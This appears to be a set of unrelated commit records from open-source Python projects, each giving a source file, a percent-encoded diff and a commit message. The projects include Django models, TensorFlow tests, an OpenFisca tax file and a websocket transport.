# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
__all__ = []
import json
from scipy import optimize
from datapipe.optimization.objectivefunc.wavelets_mrfilter_delta_psi import WaveletObjectiveFunction
from datapipe.optimization.objectivefunc.tailcut_delta_psi import TailcutObjectiveFunction
# For wavelets
import datapipe.denoising.cdf
from datapipe.denoising.inverse_transform_sampling import EmpiricalDistribution
# For tailcut
from datapipe.io import geometry_converter
def main():
algo = "wavelet_mrfilter"
#algo = "tailcut"
instrument = "astri"
#instrument = "astri_konrad"
#instrument = "digicam"
#instrument = "flashcam"
#instrument = "nectarcam"
#instrument = "lstcam"
print("algo:", algo)
print("instrument:", instrument)
if instrument == "astri":
input_files = ["/dev/shm/.jd/astri/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.ASTRI_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/astri.geom.json")
elif instrument == "astri_konrad":
input_files = ["/dev/shm/.jd/astri_konrad/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.ASTRI_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/astri.geom.json")
elif instrument == "digicam":
input_files = ["/dev/shm/.jd/digicam/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.DIGICAM_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/digicam2d.geom.json")
elif instrument == "flashcam":
input_files = ["/dev/shm/.jd/flashcam/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.FLASHCAM_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/flashcam2d.geom.json")
elif instrument == "nectarcam":
input_files = ["/dev/shm/.jd/nectarcam/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.NECTARCAM_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/nectarcam2d.geom.json")
elif instrument == "lstcam":
input_files = ["/dev/shm/.jd/lstcam/gamma/"]
noise_distribution = EmpiricalDistribution(datapipe.denoising.cdf.LSTCAM_CDF_FILE)
geom = geometry_converter.json_file_to_geom("./datapipe/io/geom/lstcam2d.geom.json")
else:
raise Exception("Unknown instrument", instrument)
if algo == "wavelet":
func = WaveletObjectiveFunction(input_files=input_files,
noise_distribution=noise_distribution,
max_num_img=None,
aggregation_method="mean") # "mean" or "median"
s1_slice = slice(1, 5, 1)
s2_slice = slice(1, 5, 1)
s3_slice = slice(1, 5, 1)
s4_slice = slice(1, 5, 1)
search_ranges = (s1_slice,
s2_slice,
s3_slice,
s4_slice)
elif algo == "tailcut":
func = TailcutObjectiveFunction(input_files=input_files,
geom=geom,
max_num_img=None,
aggregation_method="mean") # "mean" or "median"
s1_slice = slice(1, 10, 1)
s2_slice = slice(1, 10, 1)
search_ranges = (s1_slice,
s2_slice)
else:
raise ValueError("Unknown algorithm", algo)
res = optimize.brute(func,
search_ranges,
full_output=True,
finish=None) #optimize.fmin)
print("x* =", res[0])
print("f(x*) =", res[1])
# SAVE RESULTS ############################################################
res_dict = {
"best_solution": res[0].tolist(),
"best_score": float(res[1]),
"solutions": res[2].tolist(),
"scores": res[3].tolist()
}
with open("optimize_sigma.json", "w") as fd:
json.dump(res_dict, fd, sort_keys=True, indent=4) # pretty print format
if __name__ == "__main__":
main()
|
Python
| 0
|
@@ -1358,16 +1358,37 @@
import
+ObjectiveFunction as
WaveletO
@@ -1470,16 +1470,37 @@
import
+ObjectiveFunction as
TailcutO
|
00bf40ba386d7d1ffebcc1a41766250e0fc975ac
|
Add related name fields
|
src/core/models/base.py
|
src/core/models/base.py
|
from django.db import models
from django.contrib.auth.models import User
class Location(models.Model):
class Meta:
app_label = "core"
x = models.DecimalField(max_digits=10, decimal_places=5)
y = models.DecimalField(max_digits=10, decimal_places=5)
def __str__(self):
return "x:" + str(self.x) + ", y:" + str(self.y)
class Idea(models.Model):
class Meta:
app_label = "core"
time = models.DateTimeField(null=True, blank=True)
location = models.ForeignKey(Location, null=True, blank=True)
owner = models.ForeignKey(User, related_name='idea_owner')
users = models.ManyToManyField(User, through='Suggestion')
activity = models.CharField(max_length=50, blank=True)
def __str__(self):
return str(self.owner) + ":" + str(self.activity) + " @ " + str(self.location) + ", " + str(self.time)
class Suggestion(models.Model):
class Meta:
app_label = "core"
YES = 'Y'
NO = 'N'
MAYBE = 'M'
NONE = 'O'
RESPONSE_CHOICES = (
(YES, 'Yes'),
(NO, 'No'),
(MAYBE, 'Maybe'),
(NONE, 'No vote'),
)
response = models.CharField(max_length=1, choices=RESPONSE_CHOICES, default=NONE)
user = models.ForeignKey(User)
idea = models.ForeignKey(Idea)
def __str__(self):
return str(self.user) + ":" + str(self.suggestion)
class Event(models.Model):
class Meta:
app_label = "core"
owner = models.ForeignKey(User, related_name='event_owner')
invites = models.ManyToManyField(User, through='Invite')
description = models.TextField()
location = models.ForeignKey(Location)
start_time = models.DateTimeField()
end_time = models.DateTimeField(null=True, blank=True)
def __str__(self):
return str(self.owner) + ":" + str(self.location) + "@" + str(self.start_time)
class Invite(models.Model):
class Meta:
app_label = "core"
YES = 'Y'
NO = 'N'
MAYBE_YES = 'MY'
MAYBE_NO = 'MN'
NONE = 'O'
RSVP_CHOICES = (
(YES, 'Yes'),
(NO, 'No'),
(MAYBE_YES, 'Maybe Yes'),
(MAYBE_NO, 'Maybe No'),
(NONE, 'No response'),
)
event = models.ForeignKey(Event)
user = models.ForeignKey(User)
rsvp = models.CharField(max_length=2, choices=RSVP_CHOICES, default=NONE)
def __str__(self):
return str(user) + ":" + str(event)
|
Python
| 0.000001
|
@@ -499,16 +499,38 @@
ank=True
+, related_name='ideas'
)%0A%09owner
@@ -574,22 +574,17 @@
me='idea
-_owner
+s
')%0A%09user
@@ -636,16 +636,49 @@
gestion'
+, related_name='idea_suggestions'
)%0A%09activ
@@ -1181,16 +1181,44 @@
Key(User
+, related_name='suggestions'
)%0A%09idea
@@ -1241,16 +1241,44 @@
Key(Idea
+, related_name='suggestions'
)%0A%09%0A%09def
@@ -1467,14 +1467,9 @@
vent
-_owner
+s
')%0A%09
@@ -1523,16 +1523,46 @@
'Invite'
+, related_name='event_invites'
)%0A%09descr
@@ -1627,16 +1627,39 @@
Location
+, related_name='events'
)%0A%09start
@@ -2145,16 +2145,40 @@
ey(Event
+, related_name='invites'
)%0A%09user
@@ -2201,16 +2201,40 @@
Key(User
+, related_name='invites'
)%0A%09rsvp
|
ffb9c7c7f2d3b957c6b3eb458a647653f55af7d3
|
version number
|
invoice_webkit/__openerp__.py
|
invoice_webkit/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011 Camptocamp SA (http://www.camptocamp.com)
# @author Guewen Baconnier, Bessi Nicolas, Vincent Renaville
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{ 'name': 'Invoice Report using Webkit Library',
'version': '1.0',
'category': 'Reports/Webkit',
'description': """
Replaces the legacy rml Invoice report by a brand new webkit report.
""",
'author': 'Camptocamp',
'website': 'http://www.camptocamp.com',
'depends': ['base', 'report_webkit', 'base_headers_webkit', 'account'],
'init_xml': [],
'update_xml': ['invoice_report.xml',
'view/invoice_view.xml'],
'demo_xml': [],
'test': [],
'installable': True,
'active': False,
}
|
Python
| 0.000003
|
@@ -1064,16 +1064,18 @@
on': '1.
+1.
0',%0A
|
2edb2145f6f7447a7c659d7eeb51c7b75aa0c6d4
|
Add generate username signal
|
rhinocloud/contrib/auth/signals.py
|
rhinocloud/contrib/auth/signals.py
|
from django.contrib.auth.models import User
from rhinocloud.utils import random_generator
def username_shorten(sender, instance, **kwargs):
if sender == User:
if len(instance.username) > 30:
instance.username = random_generator(instance.username[:25])
def first_name_shorten(sender, instance, **kwargs):
if sender == User:
if len(instance.first_name) > 30:
instance.first_name = instance.first_name[:30]
def last_name_shorten(sender, instance, **kwargs):
if sender == User:
if len(instance.username) > 30:
instance.last_name = instance.last_name[:30]
|
Python
| 0.000297
|
@@ -85,16 +85,271 @@
rator%0A%0A%0A
+def generate_username_from_email(sender, instance, **kwargs):%0A if sender == User:%0A username = instance.email%0A if len(username) %3E 30:%0A username = random_generator(username%5B:25%5D)%0A instance.username = username%0A %0A
def user
|
c15dbc39505de93770fd89cab4f4ae9a2a72b4e1
|
fix test
|
tensorflow/python/kernel_tests/norm_op_test.py
|
tensorflow/python/kernel_tests/norm_op_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.norm."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import test as test_lib
def _AddTest(test, test_name, fn):
test_name = "_".join(["test", test_name])
if hasattr(test, test_name):
raise RuntimeError("Test %s defined more than once" % test_name)
setattr(test, test_name, fn)
class NormOpTest(test_lib.TestCase):
def testBadOrder(self):
matrix = [[0., 1.], [2., 3.]]
for ord_ in "foo", -7, -1.1, 0:
with self.assertRaisesRegexp(ValueError,
"'ord' must be a supported vector norm"):
linalg_ops.norm(matrix, ord="fro")
for ord_ in "foo", -7, -1.1, 0:
with self.assertRaisesRegexp(ValueError,
"'ord' must be a supported vector norm"):
linalg_ops.norm(matrix, ord=ord_, axis=-1)
for ord_ in 1.1, 2:
with self.assertRaisesRegexp(ValueError,
"'ord' must be a supported matrix norm"):
linalg_ops.norm(matrix, ord=ord_, axis=[-2, -1])
def testInvalidAxis(self):
matrix = [[0., 1.], [2., 3.]]
for axis_ in [], [1, 2, 3], [[1]], [[1], [2]], [3.1415], [1, 1]:
error_prefix = ("'axis' must be None, an integer, or a tuple of 2 unique "
"integers")
with self.assertRaisesRegexp(ValueError, error_prefix):
linalg_ops.norm(matrix, axis=axis_)
def _GetNormOpTest(dtype_, shape_, ord_, axis_, keep_dims_, use_static_shape_):
def _CompareNorm(self, matrix):
np_norm = np.linalg.norm(matrix, ord=ord_, axis=axis_, keepdims=keep_dims_)
with self.test_session(use_gpu=True) as sess:
if use_static_shape_:
tf_matrix = constant_op.constant(matrix)
tf_norm = linalg_ops.norm(
tf_matrix, ord=ord_, axis=axis_, keep_dims=keep_dims_)
tf_norm_val = sess.run(tf_norm)
else:
tf_matrix = array_ops.placeholder(dtype_)
tf_norm = linalg_ops.norm(
tf_matrix, ord=ord_, axis=axis_, keep_dims=keep_dims_)
tf_norm_val = sess.run(tf_norm, feed_dict={tf_matrix: matrix})
self.assertAllClose(np_norm, tf_norm_val)
def Test(self):
is_matrix_norm = (isinstance(axis_, tuple) or
isinstance(axis_, list)) and len(axis_) == 2
is_fancy_p_norm = np.isreal(ord_) and np.floor(ord_) != ord_
if ((not is_matrix_norm and ord_ == "fro") or
(is_matrix_norm and is_fancy_p_norm)):
self.skipTest("Not supported by neither numpy.linalg.norm nor tf.norm")
if ord_ == 'euclidean' or (axis_ is None and len(shape) > 2):
self.skipTest("Not supported by numpy.linalg.norm")
matrix = np.random.randn(*shape_).astype(dtype_)
if dtype_ in (np.complex64, np.complex128):
matrix += 1j * np.random.randn(*shape_).astype(dtype_)
_CompareNorm(self, matrix)
return Test
# pylint: disable=redefined-builtin
if __name__ == "__main__":
for use_static_shape in False, True:
for dtype in np.float32, np.float64, np.complex64, np.complex128:
for rows in 2, 5:
for cols in 2, 5:
for batch in [], [2], [2, 3]:
shape = batch + [rows, cols]
for ord in "euclidean", "fro", 0.5, 1, 2, np.inf:
for axis in [
None, (-2, -1), (-1, -2), -len(shape), 0, len(shape) - 1
]:
for keep_dims in False, True:
name = "%s_%s_ord_%s_axis_%s_%s_%s" % (
dtype.__name__, "_".join(map(str, shape)), ord, axis,
keep_dims, use_static_shape)
_AddTest(NormOpTest, "Norm_" + name,
_GetNormOpTest(dtype, shape, ord, axis, keep_dims,
use_static_shape))
test_lib.main()
|
Python
| 0.000002
|
@@ -1372,33 +1372,33 @@
for ord_ in %22f
-o
+r
o%22, -7, -1.1, 0:
@@ -1558,21 +1558,20 @@
ix, ord=
-%22fro%22
+ord_
)%0A%0A f
@@ -1583,17 +1583,17 @@
d_ in %22f
-o
+r
o%22, -7,
@@ -1797,14 +1797,28 @@
in
+%22foo%22, -7, -1.1,
1.1
-, 2
:%0A
|
916638e11ef20e2976c81f0e8230079cf96a3c3a
|
Set DJANGO_SETTINGS_MODULE env variable.
|
ibms_project/wsgi.py
|
ibms_project/wsgi.py
|
"""
WSGI config for IBMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
"""
import dotenv
from django.core.wsgi import get_wsgi_application
import os
from pathlib import Path
# These lines are required for interoperability between local and container environments.
d = Path(__file__).resolve().parents[1]
dot_env = os.path.join(str(d), '.env')
if os.path.exists(dot_env):
dotenv.read_dotenv(dot_env)
application = get_wsgi_application()
|
Python
| 0
|
@@ -440,16 +440,89 @@
t_env)%0A%0A
+os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22ibms_project.settings%22)%0A
applicat
|
2636d76fa4d9dd820fd673bc6044f4c3ccdfd0b1
|
Fix permissions fixture problem.
|
src/encoded/tests/test_permissions.py
|
src/encoded/tests/test_permissions.py
|
import pytest
@pytest.datafixture
def users(app):
from webtest import TestApp
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': 'TEST',
}
testapp = TestApp(app, environ)
from .sample_data import URL_COLLECTION
url = '/labs/'
for item in URL_COLLECTION[url]:
res = testapp.post_json(url, item, status=201)
url = '/awards/'
for item in URL_COLLECTION[url]:
res = testapp.post_json(url, item, status=201)
url = '/users/'
users = []
for item in URL_COLLECTION[url]:
res = testapp.post_json(url, item, status=201)
users.append(res.json['@graph'][0])
return users
@pytest.fixture
def wrangler(users, app, external_tx, zsa_savepoints):
user = [u for u in users if 'wrangler' in u['groups']][0]
from webtest import TestApp
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': str(user['uuid']),
}
return TestApp(app, environ)
@pytest.fixture
def submitter(users, app, external_tx, zsa_savepoints):
user = [u for u in users if not u['groups']][0]
from webtest import TestApp
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': str(user['uuid']),
}
return TestApp(app, environ)
@pytest.fixture
def lab():
return 'b635b4ed-dba3-4672-ace9-11d76a8d03af'
@pytest.fixture
def award():
return 'Myers'
@pytest.mark.parametrize('url', ['/organisms/', '/sources/'])
def test_wrangler_post_non_lab_collection(wrangler, url):
from .sample_data import URL_COLLECTION
collection = URL_COLLECTION[url]
for item in collection:
res = wrangler.post_json(url, item, status=201)
assert item['name'] in res.location
@pytest.mark.parametrize('url', ['/organisms/', '/sources/'])
def test_submitter_post_non_lab_collection(submitter, url):
from .sample_data import URL_COLLECTION
collection = URL_COLLECTION[url]
for item in collection:
item = item.copy()
del item['uuid']
submitter.post_json(url, item, status=403)
def test_submitter_post_update_experiment(submitter, lab, award):
experiment = {'lab': lab, 'award': award}
res = submitter.post_json('/experiment/', experiment, status=201)
location = res.location
res = submitter.get(location + '@@testing-allowed?permission=edit', status=200)
assert res.json['has_permission'] is True
assert 'submits_for.%s' % lab in res.json['principals_allowed_by_permission']
submitter.patch_json(location, {'description': 'My experiment'}, status=200)
|
Python
| 0
|
@@ -16,20 +16,16 @@
@pytest.
-data
fixture%0A
@@ -38,178 +38,17 @@
ers(
+test
app):
-%0A from webtest import TestApp%0A environ = %7B%0A 'HTTP_ACCEPT': 'application/json',%0A 'REMOTE_USER': 'TEST',%0A %7D%0A testapp = TestApp(app, environ)%0A
%0A
|
1a6c6228927b343071d0fc5e1959920bf30e6252
|
clean up
|
darkoob/social/models.py
|
darkoob/social/models.py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from neomodel import StructuredNode, IntegerProperty, RelationshipTo, RelationshipFrom
from darkoob.book.models import Quote, Book
import datetime
from django.utils.timezone import utc
SEX_CHOICES = (
('Male', 'Male'),
('Female', 'Female'),
)
class UserNode(StructuredNode):
user_id = IntegerProperty(required=True, index=True)
following = RelationshipTo('UserNode', 'FOLLOW')
followers = RelationshipFrom('UserNode', 'FOLLOW')
def follow_person(self, user_id):
followed_user = self.index.get(user_id=user_id)
self.following.connect(followed_user, {'time': str(datetime.datetime.utcnow())})
def is_following(self, user_id):
''' return True if user in self.following.all() else False '''
user = self.index.get(user_id=user_id)
return True if user in self.following.all() else False
def is_followers(self, user_id):
''' return True if user in self.followers.all() else False '''
user = self.index.get(user_id=user_id)
return True if user in self.followers.all() else False
class Country(models.Model):
name = models.CharField(max_length=50)
def __unicode__(self):
return self.name
class City(models.Model):
name = models.CharField(max_length=50)
country = models.OneToOneField(Country)
def __unicode__(self):
return self.name
class UserProfile(models.Model):
user = models.OneToOneField(User)
sex = models.CharField(max_length=6, choices=SEX_CHOICES)
birthday = models.DateField(null=True)
mobile = models.CharField(max_length=20, null=True, blank=True)
website = models.URLField(null=True, blank=True)
city = models.OneToOneField(City, null=True, blank=True)
quote = models.ForeignKey(Quote, null=True, blank=True)
favorite_books = models.ManyToManyField(Book, null=True, blank=True)
# for django model
# def favorite_books(self):
# return ', '.join([a.title for a in self.favorite_books.all()])
# favorite_books.short_description = "Favorite Book"
# NOTE: userprof_obj.education_set.all() return all education set of a person
# def get_related_migrations(self):
# from darkoob.migration.models import Migration, Hop
# print Hop.objects.filter(host=user)
def __unicode__(self):
return self.user.get_full_name()
class School(models.Model):
name = models.CharField(max_length=50)
def __unicode__(self):
return self.name
class Education(models.Model):
user_profile = models.ForeignKey(UserProfile, related_name='education_set')
school = models.OneToOneField(School)
def __unicode__(self):
return unicode(self.school)
def create_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
UserNode(user_id=instance.id).save()
print "a node with user_id %d created!" % instance.id
post_save.connect(create_user_profile, sender=User)
|
Python
| 0.000001
|
@@ -602,32 +602,82 @@
self, user_id):%0A
+ ''' follow person that user.id=user_id'''%0A
followed
@@ -708,32 +708,32 @@
ser_id=user_id)%0A
-
self.fol
@@ -805,16 +805,17 @@
ow())%7D)%0A
+%0A
def
@@ -1025,16 +1025,17 @@
e False%0A
+%0A
def
@@ -1173,32 +1173,32 @@
ser_id=user_id)%0A
+
return T
@@ -1245,18 +1245,16 @@
False%0A%0A
-%0A%0A
class Co
|
d51a13ed70c157d90c2d77461ad1747f7ce12e7c
|
Improve comment syntax
|
openfisca_country_template/variables/taxes.py
|
openfisca_country_template/variables/taxes.py
|
# -*- coding: utf-8 -*-
# This file defines the variables of our legislation.
# A variable is property of a person, or an entity (e.g. a household).
# See http://openfisca.org/doc/variables.html
# Import from openfisca-core the common python objects used to code the legislation in OpenFisca
from openfisca_core.model_api import *
# Import the entities specifically defined for this tax and benefit system
from openfisca_country_template.entities import *
class income_tax(Variable):
value_type = float
entity = Person
definition_period = MONTH
label = u"Income tax"
reference = "https://law.gov.example/income_tax" # Always use the most official source
# The formula to compute the income tax for a given person at a given period
def formula(person, period, parameters):
return person('salary', period) * parameters(period).taxes.income_tax_rate
class social_security_contribution(Variable):
value_type = float
entity = Person
definition_period = MONTH
label = u"Progressive contribution paid on salaries to finance social security"
reference = "https://law.gov.example/social_security_contribution" # Always use the most official source
def formula(person, period, parameters):
salary = person('salary', period)
# The social_security_contribution is computed according to a marginal scale.
scale = parameters(period).taxes.social_security_contribution
return scale.calc(salary)
class housing_tax(Variable):
value_type = float
entity = Household
definition_period = YEAR # This housing tax is defined for a year.
label = u"Tax paid by each household proportionally to the size of its accommodation"
reference = "https://law.gov.example/housing_tax" # Always use the most official source
def formula(household, period, parameters):
# The housing tax is defined for a year, but depends on the `accomodation_size` and `housing_occupancy_status` on the first month of the year.
# Here period is a year. We can get the first month of a year with the following shortcut.
# To build different periods, see http://openfisca.org/doc/coding-the-legislation/35_periods.html#calculating-dependencies-for-a-specific-period
january = period.first_month
accommodation_size = household('accomodation_size', january)
# `housing_occupancy_status` is an Enum variable
occupancy_status = household('housing_occupancy_status', january)
HousingOccupancyStatus = occupancy_status.possible_values # Get the enum associated with the variable
# To access an enum element, we use the . notation.
tenant = (occupancy_status == HousingOccupancyStatus.tenant)
owner = (occupancy_status == HousingOccupancyStatus.owner)
# The tax is applied only if the household owns or rents its main residency
return (owner + tenant) * accommodation_size * 10
|
Python
| 0.000015
|
@@ -2658,17 +2658,19 @@
use the
-.
+%60.%60
notatio
|
da1df870f5d5b7703c4c4c3a6b8cb7d140778469
|
Set default task target to 100.
|
source/vistas/core/task.py
|
source/vistas/core/task.py
|
from threading import RLock
class Task:
STOPPED = 'stopped'
RUNNING = 'running'
INDETERMINATE = 'indeterminate'
COMPLETE = 'complete'
SHOULD_STOP = 'should_stop'
tasks = []
def __init__(self, name, description=None, target=0, progress=0):
self.name = name
self.description = description
self._target = target
self._progress = progress
self._status = self.STOPPED
self.lock = RLock()
Task.tasks.append(self)
@property
def stopped(self):
return self._status == self.STOPPED
@property
def running(self):
return self._status == self.RUNNING
@property
def indeterminate(self):
return self._status == self.INDETERMINATE
@property
def complete(self):
return self._status == self.COMPLETE
@property
def should_stop(self):
return self._status == self.SHOULD_STOP
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
if self.complete:
Task.tasks.remove(self)
@property
def target(self):
with self.lock:
return self._target
@target.setter
def target(self, value):
with self.lock:
self._target = value
@property
def progress(self):
with self.lock:
return self._progress
@progress.setter
def progress(self, value):
with self.lock:
self._progress = value
@property
def percent(self):
with self.lock:
return int(self._progress / self._target * 100)
def inc_target(self, increment=1):
with self.lock:
self._target += increment
def inc_progress(self, increment=1):
with self.lock:
self._progress += increment
|
Python
| 0.00002
|
@@ -248,16 +248,18 @@
target=
+10
0, progr
|
28634376d83595783a52255baee172c88dc33b71
|
fix find_user
|
oclubs/objs/user.py
|
oclubs/objs/user.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
from __future__ import absolute_import, unicode_literals
from flask_login import UserMixin
from passlib.context import CryptContext
from xkcdpass import xkcd_password as xp
from oclubs.access import database, email
from oclubs.enums import UserType
from oclubs.exceptions import NoRow
from oclubs.objs.base import BaseObject, Property, ListProperty
_crypt = CryptContext(schemes=['bcrypt']) # , 'sha512_crypt', 'pbkdf2_sha512'
_words = xp.generate_wordlist(wordfile=xp.locate_wordfile())
def _encrypt(password):
if password is None:
return ''
else:
return _crypt.encrypt(password)
class User(BaseObject, UserMixin):
table = 'user'
identifier = 'user_id'
studentid = Property('user_login_name')
passportname = Property('user_passport_name')
password = Property('user_password', (NotImplemented, _encrypt))
nickname = Property('user_nick_name', rediscached=True)
email = Property('user_email')
phone = Property('user_phone')
picture = Property('user_picture', 'Upload')
type = Property('user_type', UserType)
grade = Property('user_grade')
currentclass = Property('user_class')
clubs = ListProperty('club_member', 'cm_user', 'cm_club', 'Club')
def cas_in_club(self, club):
return database.fetch_oneentry(
'attendance',
database.RawSQL('SUM(act_cas)'),
{
'join': [('inner', 'activity', [('act_id', 'att_act')])],
'where': [('=', 'att_user', self.id)],
}
) or 0
def activities_reminder(self, types, signedup_only=False):
from oclubs.objs import Activity
if signedup_only:
return Activity.get_activities_conditions(
types,
{
'join': [('inner', 'signup',
[('act_id', 'signup_act')])],
'where': [('=', 'signup_user', self.id)]
},
dates=(False, True),
order_by_time=True
)
else:
return Activity.get_activities_conditions(
types,
{
'join': [('inner', 'club_member',
[('act_club', 'cm_club')])],
'where': [('=', 'cm_user', self.id)]
},
dates=(False, True),
order_by_time=True
)
def email_user(self, title, contents):
address = self.email or 'root@localhost'
email.send((address, self.passportname), title, contents)
@staticmethod
def attempt_login(studentid, password):
def emptypw():
# to gave some delay, verify empty password and discard the results
_crypt.verify(
password,
'$2a$12$mf04JOZtIxRtPFw793AGyeYGHGuiN2ikL/HO9fEKdCIilJqwRZKg.'
)
if not password:
emptypw()
return
try:
data = database.fetch_onerow(
'user',
{'user_id': 'id', 'user_password': 'password'},
{'user_login_name': studentid}
)
except NoRow:
emptypw()
return
else:
if not data['password']:
emptypw()
return
elif _crypt.verify(password, data['password']):
return User(data['id'])
else:
return
@staticmethod
def find_user(studentid, passportname):
try:
data = database.fetch_onerow(
'user',
{'user_id': 'id', 'user_passport_name': 'passportname'},
{'user_login_name': studentid}
)
except NoRow:
return
else:
if _crypt.verify(passportname, data['passportname']):
return User(data['id'])
else:
return
@classmethod
def allusers(cls):
tempdata = database.fetch_onecol(
cls.table,
cls.identifier,
[]
)
return [cls(item) for item in tempdata]
@staticmethod
def generate_password():
return xp.generate_xkcdpassword(_words)
|
Python
| 0.999159
|
@@ -3598,39 +3598,44 @@
ry:%0A
-data =
+return User(
database.fetch_o
@@ -3628,35 +3628,37 @@
tabase.fetch_one
-row
+entry
(%0A
@@ -3675,33 +3675,32 @@
-%7B
'user_id': 'id',
@@ -3696,54 +3696,27 @@
_id'
-: 'id', 'user_passport_name': 'passportname'%7D,
+,%0A %7B
%0A
@@ -3720,33 +3720,36 @@
-%7B
+
'user_login_name
@@ -3752,33 +3752,33 @@
name': studentid
-%7D
+,
%0A )%0A
@@ -3770,34 +3770,32 @@
-)%0A
except NoRow
@@ -3786,92 +3786,22 @@
-except NoRow:%0A return%0A else:%0A if _crypt.verify(
+'user_
passport
name
@@ -3800,20 +3800,16 @@
port
+_
name
-, data%5B'
+':
pass
@@ -3816,20 +3816,16 @@
portname
-'%5D):
%0A
@@ -3837,54 +3837,47 @@
-return User(data%5B'id'%5D)%0A else:%0A
+%7D%0A ))%0A except NoRow:%0A
|
8fbef5b55d5ac5d288582a7395e37c963843852b
|
Add exception handling
|
devicehive/transports/websocket_transport.py
|
devicehive/transports/websocket_transport.py
|
from devicehive.transports.transport import Transport
from devicehive.transports.transport import TransportRequestException
import websocket
import threading
import time
class WebsocketTransport(Transport):
"""Websocket transport class."""
def __init__(self, data_format_class, data_format_options, handler_class,
handler_options):
Transport.__init__(self, 'websocket', data_format_class,
data_format_options, handler_class, handler_options)
self._connection_thread = None
self._websocket = websocket.WebSocket()
self._pong_received = False
self._event_queue = []
if self._data_type == 'text':
self._data_opcode = websocket.ABNF.OPCODE_TEXT
else:
self._data_opcode = websocket.ABNF.OPCODE_BINARY
def _connection(self, url, options):
pong_timeout = options.pop('pong_timeout', None)
self._connect(url, **options)
if pong_timeout:
ping_thread = threading.Thread(target=self._ping,
args=(pong_timeout,))
ping_thread.name = 'websocket-transport-ping'
ping_thread.daemon = True
ping_thread.start()
self._receive()
self._close()
def _connect(self, url, **options):
timeout = options.pop('timeout', None)
self._websocket.connect(url, **options)
self._websocket.settimeout(timeout)
self._connected = True
self._call_handler_method('handle_connect')
def _ping(self, pong_timeout):
while self._connected:
self._websocket.ping()
self._pong_received = False
time.sleep(pong_timeout)
if not self._pong_received:
self._connected = False
return
def _receive(self):
while self._connected:
if len(self._event_queue):
event = self._event_queue.pop(0)
self._call_handler_method('handle_event', event)
continue
opcode, frame = self._websocket.recv_data_frame(True)
if opcode == websocket.ABNF.OPCODE_TEXT:
event = self._decode(frame.data.decode('utf-8'))
self._call_handler_method('handle_event', event)
continue
if opcode == websocket.ABNF.OPCODE_BINARY:
event = self._decode(frame.data)
self._call_handler_method('handle_event', event)
continue
if opcode == websocket.ABNF.OPCODE_PONG:
self._pong_received = True
continue
if opcode == websocket.ABNF.OPCODE_CLOSE:
return
def _close(self):
self._websocket.close()
self._pong_received = False
self._event_queue = []
self._call_handler_method('handle_close')
def _send_request(self, action, request):
request[self.REQUEST_ID_KEY] = self._uuid()
request[self.REQUEST_ACTION_KEY] = action
self._websocket.send(self._encode(request), opcode=self._data_opcode)
return request[self.REQUEST_ID_KEY]
def connect(self, url, **options):
self._ensure_not_connected()
self._connection_thread = threading.Thread(target=self._connection,
args=(url, options))
self._connection_thread.name = 'websocket-transport-connection'
self._connection_thread.daemon = True
self._connection_thread.start()
def send_request(self, action, request, **params):
self._ensure_connected()
return self._send_request(action, request)
def request(self, action, request, **params):
self._ensure_connected()
timeout = params.pop('timeout', 30)
request_id = self._send_request(action, request)
send_time = time.time()
while time.time() - timeout < send_time:
response = self._decode(self._websocket.recv())
if response.get(self.REQUEST_ID_KEY) == request_id:
return response
self._event_queue.append(response)
raise WebsocketTransportRequestException('Timeout occurred')
def close(self):
self._ensure_connected()
self._connected = False
def join(self, timeout=None):
self._connection_thread.join(timeout)
class WebsocketTransportRequestException(TransportRequestException):
"""Websocket transport request exception."""
pass
|
Python
| 0.000005
|
@@ -151,16 +151,27 @@
reading%0A
+import sys%0A
import t
@@ -926,32 +926,49 @@
timeout', None)%0A
+ try:%0A
self._co
@@ -997,16 +997,20 @@
+
if pong_
@@ -1018,16 +1018,20 @@
imeout:%0A
+
